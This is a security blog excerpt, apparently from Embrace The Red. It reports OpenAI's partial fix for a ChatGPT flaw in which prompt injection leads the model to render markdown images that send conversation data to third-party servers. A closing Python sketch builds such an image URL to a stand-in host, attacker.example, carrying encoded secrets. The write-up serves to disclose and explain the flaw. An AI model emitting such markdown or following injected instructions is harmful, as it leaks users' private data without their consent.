Dec. 20, 2023, 10:35 a.m.

Embrace The Red embracethered.com

OpenAI appears to have implemented a first mitigation for a well-known data exfiltration vulnerability in ChatGPT. During a prompt injection, attackers can abuse image markdown rendering to send data to third-party servers without the user's consent.
The fix is not perfect, but it is a step in the right direction. In this post I share what I have figured out so far about the fix after looking at it briefly this morning.
Background: Yesterday I was doing a live demo of the data …
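For readers unfamiliar with the technique, here is a minimal sketch of the image-markdown exfiltration pattern described above. The server URL, query parameter, and helper function are hypothetical and purely illustrative; this is not the actual payload from the post, only the general shape of it: injected instructions ask the model to emit a markdown image whose URL carries conversation data, so the client's image fetch leaks that data to an attacker-controlled server.

```python
# Illustrative sketch only: hypothetical attacker endpoint and helper names.
from urllib.parse import quote

ATTACKER_SERVER = "https://attacker.example/log"  # hypothetical collection endpoint


def build_exfil_markdown(secret: str) -> str:
    """Return the markdown an injected prompt would ask the model to emit."""
    # URL-encode the stolen text and embed it as a query parameter. When the
    # chat client renders the "image", it issues a GET request that carries
    # `secret` to the attacker's server.
    return f"![loading]({ATTACKER_SERVER}?q={quote(secret)})"


if __name__ == "__main__":
    print(build_exfil_markdown("user's confidential summary"))
    # -> ![loading](https://attacker.example/log?q=user%27s%20confidential%20summary)
```

The mitigation discussed in the post targets exactly this rendering step: if the client checks image URLs before fetching them, the GET request that leaks the data never leaves the user's browser.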

